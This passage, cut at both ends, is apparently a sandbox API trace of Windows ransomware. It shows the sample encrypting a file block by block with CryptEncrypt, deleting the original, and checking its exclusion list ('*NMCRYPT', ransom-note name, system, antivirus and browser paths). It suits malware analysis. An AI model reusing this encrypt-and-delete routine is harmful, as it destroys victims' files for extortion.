lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.666] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.666] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.666] GetLastError () returned 0x0 [0148.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.666] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.666] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.666] GetLastError () returned 0x0 [0148.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.666] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.666] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.666] GetLastError () returned 0x0 [0148.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.666] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.666] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.666] GetLastError () returned 0x0 [0148.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.666] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.667] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.667] GetLastError () returned 0x0 [0148.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.667] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.667] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.667] GetLastError () returned 0x0 [0148.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.667] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.667] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.667] GetLastError () returned 0x0 [0148.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.667] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.667] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.667] GetLastError () returned 0x0 [0148.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.667] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.667] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.667] GetLastError () returned 0x0 [0148.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.667] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.667] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.667] GetLastError () returned 0x0 [0148.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.668] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.668] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.668] GetLastError () returned 0x0 [0148.668] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.668] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.668] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.668] GetLastError () returned 0x0 [0148.668] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.668] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x28, lpOverlapped=0x0) returned 1 [0148.668] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x28, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x30) returned 1 [0148.668] GetLastError () returned 0x0 [0148.668] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x30, lpOverlapped=0x0) returned 1 [0148.668] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0148.668] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0148.668] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0148.668] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi", dwFileAttributes=0x20) returned 0 [0148.669] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 1 [0148.669] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0 [0148.669] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" [0148.669] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0148.669] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXB7BC.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxb7bc.tmp")) returned 0xb7bc [0148.669] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXB7BC.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxb7bc.tmp"), dwFlags=0x1) returned 0 [0148.670] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXB7BC.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxb7bc.tmp")) returned 1 [0148.670] CryptDestroyKey (hKey=0x9ad838) returned 1 [0148.670] wcslen (_String="OK") returned 0x2 [0148.670] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.670] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.670] CryptDestroyKey (hKey=0x9ad478) returned 1 [0148.670] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0148.670] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0148.670] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*NMCRYPT") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*Recovers your files.html") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*.exe") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*.dll") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*.lnk") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*.bat") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*.ini") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*.msi") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*.scf") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*pagefile.sys*") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*NTUSER.DAT*") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*AppData*") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*\\winrar\\*") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*\\java\\*") returned 0 [0148.670] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*\\TeamViewer\\*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*\\windows\\*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*\\ESET\\*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*\\AVG\\*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*\\AVIRA\\*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*\\AVAST Software\\*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*Atheros*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*Realtek*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*bootmgr*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*boot*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*boot*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*CONFIG.SYS*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*IO.SYS*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*MSDOS.SYS*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*NTDETECT.COM*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*ntldr*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*chrome*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*opera*") returned 0 [0148.671] PathMatchSpecW (pszFile="boxed-join.avi", pszSpec="*firefox*") returned 0 [0148.671] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi", pszSpec="*") returned 1 [0148.671] strlen (_Str="NMoreira") returned 0x8 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.672] 